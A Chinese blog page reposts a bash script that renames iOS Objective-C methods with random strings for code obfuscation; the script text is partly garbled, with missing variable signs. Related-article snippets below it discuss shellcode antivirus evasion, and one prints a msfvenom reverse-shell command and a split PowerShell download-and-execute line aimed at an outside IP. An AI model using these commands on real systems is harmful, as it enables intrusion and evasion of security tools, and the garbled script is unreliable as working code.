shell脚本初试(代码混淆)

最新推荐文章于 2025-03-31 09:30:20 发布
最新推荐文章于 2025-03-31 09:30:20 发布
阅读量1.7k 收藏 1
点赞数
文章标签: shell 运维 awk
原文链接:https://juejin.im/post/5ab2b31df265da2377194dcf
版权

#!/usr/bin/env bash

获取指定长度的方法-随机字符串 参数为$1

ramdomMethodString() { openssl rand -base64 64 | tr -cd 'a-zA-Z' |head -c $1 }

获取指定长度的参数-随机字符串 参数为$1

ramdomParmString() { openssl rand -base64 64 | tr -cd 'a-zA-Z' |head -c 6 }

获取随机参数类型

getParmType(){ array=(NSString* int BOOL) index=[RANDOM%3] echo {array[index]} }

指定脚本操作的路径

runShellPath='iPhoneBrowser/Controllers' #存储混淆配置文件的路径 ObfuscatedCodePath="/Users/a123451/Desktop/ObfuscatedCode" #混淆配置文件完整路径 ObfuscatedCodeName=/Users/a123451/Desktop/ObfuscatedCode/ObfuscatedCode.txt #在桌面创建存储混淆配置文件的文件夹 if [ ! -d "/ObfuscatedCode" ];then mkdir ObfuscatedCodePath else rm -rObfuscatedCodePath mkdir ObfuscatedCodePath echo "文件夹已存在" fi #获取指定目录下.h文件里的方法名 array1=(grep -h -r -I "^[-+]" $runShellPath --include '.h' |sed "s/[+-]//g"|sed "s/[();,: ^/{]/ /g"|sed "s/[ ]</</"| sed "/^[ ]IBAction/d"|awk '{split(0,b," "); print b[2]; }'| sort|uniq |sed "/^/d" ) #获取指定目录下.h文件里的类名 array2=(grep -h -r -I "^@interface"runShellPath --include '.h' |sed "s/@interface//g"|cut -d ':' -f 1|sort|uniq ) #获取指定目录下.h文件里的协议名 array3=(grep -h -r -I "^@protocol"runShellPath --include '.h' |sed "s/@protocol//g"|cut -d '<' -f 1|sort|uniq )

echo ${array1[*]}

echo ${array2[*]}

echo ${array3[*]}

resultArray=() for method in ${array1[*]}; do

length=${#method} #方法名长
methodRamdom=`ramdomMethodString $length` #根据方法名长度获取随机字符串长度
parmName1=`ramdomParmString` #获取参数名1
parmName2=`ramdomParmString` #获取参数名2
parmType=`getParmType`	#参数类型
echo $method--$methodRamdom--$parmName1--$parmType--$parmName2 >>$ObfuscatedCodeName
复制代码

done

转载于:https://juejin.im/post/5ab2b31df265da2377194dcf

python编写shellcode_免杀 - shellcode简单混淆BypassAv
weixin_32539505的博客
02-10 1816
前言在进行渗透测试过程中,往往会遇到主机有杀软,导致我们的木马被查杀,那么我们就得想办法绕过杀软进行上线Cobalt strike 或者 Metasploiit环境: Cobalt strike 4.1 Python pyinstaller何为shellcode?百度百科是这样介绍它的:“shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获...
免杀基本知识,shellcode混淆免杀
2401_84466223的博客
06-04 934
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
shell脚本代码混淆
ZXW_NUDT的博客
11-04 2510
shell脚本代码混淆
ZSC:生成定制化shellcode和混淆脚本的开源工具
最新发布
gitblog_00633的博客
03-31 402
ZSC:生成定制化shellcode和混淆脚本的开源工具 ZSC OWASP ZSC - Shellcode/Obfuscate Code Generator https://www.secologist.com/ 项目地址: h...
shell混淆
qq_52861623的博客
05-20 373
shell混淆处 1、用命令的执行结果为变量赋值的两种方法command 或 (command),哪个更好?答:第一种方式把命令用反引号‘‘(位于Esc键的下方)包围起来,反引号和单引号非常相似,容易产生混淆。第一种方法赋值是先赋值(整个shell命令都当作字符来赋值),再执行命令第二种方式把命令用(command ),哪个更好? 答:第一种方式把命令用反引号` `(位于 Esc 键的下方)包围起来,反引号和单引号非常相似,容易产生混淆。第一种方法赋值是先赋值(整个shell命令都当作字符来赋值),再执行
玩转shell-shell编程中那些易混淆的知识点大汇总!
abcnull 的博客
05-27 544
文章目录`${arr[@]}`和`${arr[*]}`的区别`echo`和`printf`的区别`-z`和`-n`和`!`的区别`''`和`""`的区别`ls -l`和`ll`命令的区别`let`和(())的区别`$()`和` `` `的区别各类括号的区别 ${arr[@]}和${arr[*]}的区别 其实二者都是表示数组所有元素,担忧一丁点小的区别,那就是${arr[*]}配上双引号就会被识别为字符串,但是${arr[@]}就很纯粹了,它总是数组,所以我们推荐使用${arr[@]}的型式。我们看看下面简
Shellcode混淆研究
SHELLCODE_8BIT的博客
05-25 287
X86 Shellcode Obfuscation - Part 1
关于shell脚本的一些容易混淆的概念
weixin_34337381的博客
06-26 154
$@和$*的区别[lf@x201t~]$vim my_fun.sh#!/bin/bash# $@ and $*my_fun (){ echo "$#"}echo 'the number of parameter in "$@" is' $(my_fun "$@")echo 'the number of parameter in $@ is' ...
java执行shell脚本_容易混淆的基础问题:Scala+shell脚本近期随笔
weixin_39628945的博客
12-02 157
前言:这些东西又有点太初级了,但是不总结也不行,比较晦涩的东西我做得也不够好,反而是基础的东西可能对一些朋友有帮助,我准备再建一个基础知识专栏,把内容分级放一下。1.Scala的构造函数问题:主构造函数和类结构体完美的融合在一起在这种情况下,类结构体本身就是主函数的作用域,也就是说class Student {...}中...的部分就可以作为主构造函数的方法体被执行。次构造必须调用主构造,次构造的...
shellcode混淆加密()
m0_62466350的博客
12-01 1854
本文首发博客园https://www.cnblogs.com/fdxsec/p/17827348.html。
Shell && C 易混淆语法
llanlianggui的博客
03-13 287
#记录工作中Shell语法与linux易混淆的语法 Linux Shell: 1. 变量++ a=$(($a+1)) 2. switch语句 case a in 1) echo "a=1"; ;; 2) echo "a=2" ;; *) echo "a=$a" ...
iOS使用shell脚本注入混淆内容
weixin_34320724的博客
02-14 194
2019独角兽企业重金招聘Python工程师标准>>> ...
ShellObfuscationExamples:如何混淆shell脚本。 哎呀!
04-27
混淆示例 您问如何混淆Bash或Shell脚本? 好吧,桑尼,这是怎么回事。 执照 该作品已根据知识共享署名-非商业性-相同方式共享4.0国际许可进行了许可。 要查看此许可证的副本,请访问 。
js压缩混淆shell脚本开发
qq_30104419的博客
12-26 586
    js脚本如果不压缩很容易让人破解你的前端逻辑,网上各式各样的压缩工具有很多,我利用uglifyjs自己编写了一个意见压缩js的shell脚本。为了不影响我们开发者调试,就把压缩的js新保存为.min的js。     在这里要说明一下,需要在nginx中配置访问的时候注意,若不能访问到min的js就rewrite到未压缩的js。所以这里调试的时候只需要删除待min的js就可以了。话不多少,...
代码混淆
weixin_33832340的博客
08-23 97
代码混淆选择性混淆步骤 代码混淆 选择性混淆 步骤 1、创建 confuse.sh 和 func.list 文件 confuse.sh —— 就是脚本文件,将需要混淆的 属性名 和 方法名 用随机字符串换 func.list —— 用来罗列需要混淆的 方法名 和 属性名 。 $ touch confuse.sh $ touch func.list 复制代码 2、添加进项目 3、添加运行脚本 ...
PowerShell混淆相关
JiangBuLiu的博客
06-18 348
????????????相关技术文章2016.05.26-[利用机器学习检测恶意PowerShell](https://bbs.pediy.com/thread-230002.htm)2018.11.09-[FireEye - 基于机器学习的模糊命令行检测](https://www.fireeye.com/blog/threat-research/2018/11/obfuscated-command-line-detection-using-machine-learning.html)2018.11.28-
Pcalua+Powershell混淆
reaido的博客
01-29 340
一、Pcalua加载shellcode 1、msfvenom生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1 2、混淆处理 powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.
脚本命令类恶意代码——PowerShell混淆脚本分析方法
信息安全
09-27 1507
由于PowerShell具有强大的系统管理和自动化能力,它可以被用于执行恶意代码、进行横向移动、执行无文件攻击等恶意行为。其中,Office宏病毒是一种常见的恶意软件形式,它利用Office文档中的宏代码来调用PowerShell并执行恶意行为。这种攻击方式通常会利用社会工程学手段来诱使用户启用宏代码,从而触发PowerShell的执行。此外,还有一种被称为"无文件攻击"的攻击技术,通过利用PowerShell的内存执行功能,无需在受感染系统上写入可执行文件,从而执行恶意行为而不留下明显的痕迹。
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1836
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值